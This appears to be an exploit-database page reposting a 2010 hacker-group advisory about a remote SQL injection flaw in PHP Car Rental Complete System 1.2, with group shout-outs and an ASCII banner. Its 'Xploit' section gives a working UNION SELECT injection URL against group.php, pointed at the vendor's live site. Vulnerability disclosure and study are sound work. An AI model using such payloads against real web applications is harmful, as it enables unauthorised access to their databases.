PHP Car Rental Complete System 1.2 remote SQL injection

2010.06.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Title:PHP car rental complete System V1.2 SQli vulnerability # Author: Sid3^effects # Published: 2010-06-06 # price:450 EURo # email:shell_c99@yahoo.com # vendor: NUNO PEREIRA # url : http://www.acarhire.me.uk/ ############################################################################ ooooo .oooooo. oooooo oooooo oooo `888' d8P' `Y8b `888. `888. .8' 888 888 `888. .8888. .8' 888 888 `888 .8'`888. .8' 888 888 `888.8' `888.8' 888 `88b ooo `888' `888' o888o `Y8bood8P' `8' `8' -------------------------------------------------------------------------------------- #####################Sid3^effects aKa HaRi################################## #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] #Thanks:*L0rd rusAd&#234;r*,d4rk-blu&#65533;reg;,R45C4L,CR4C|< 008,M4n0j,MaYuR #ShouTZ:kedar,dec0d3r,41.w4r10r #spl shoutz:LiquidWorm,gunslinger_ :D #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ Description : PHP Car Rental-Script You can try our latest stable release as it becomes available. To launch the demo open both the web site and control panel views so you can preview your changes as they are made in real time from the control panel. its very simple to use for the client and for the administration to change prices aand add promotions i also has a built in newsletter facility and email collection ############################################################################ Xploit : PHP car rental complete System V1.2 suffers from a sqli vulnerability.. url:http://www.acarhire.me.uk/group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12-- ############################################################################ #spl thks: exploit-db team #Sid3^effects


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top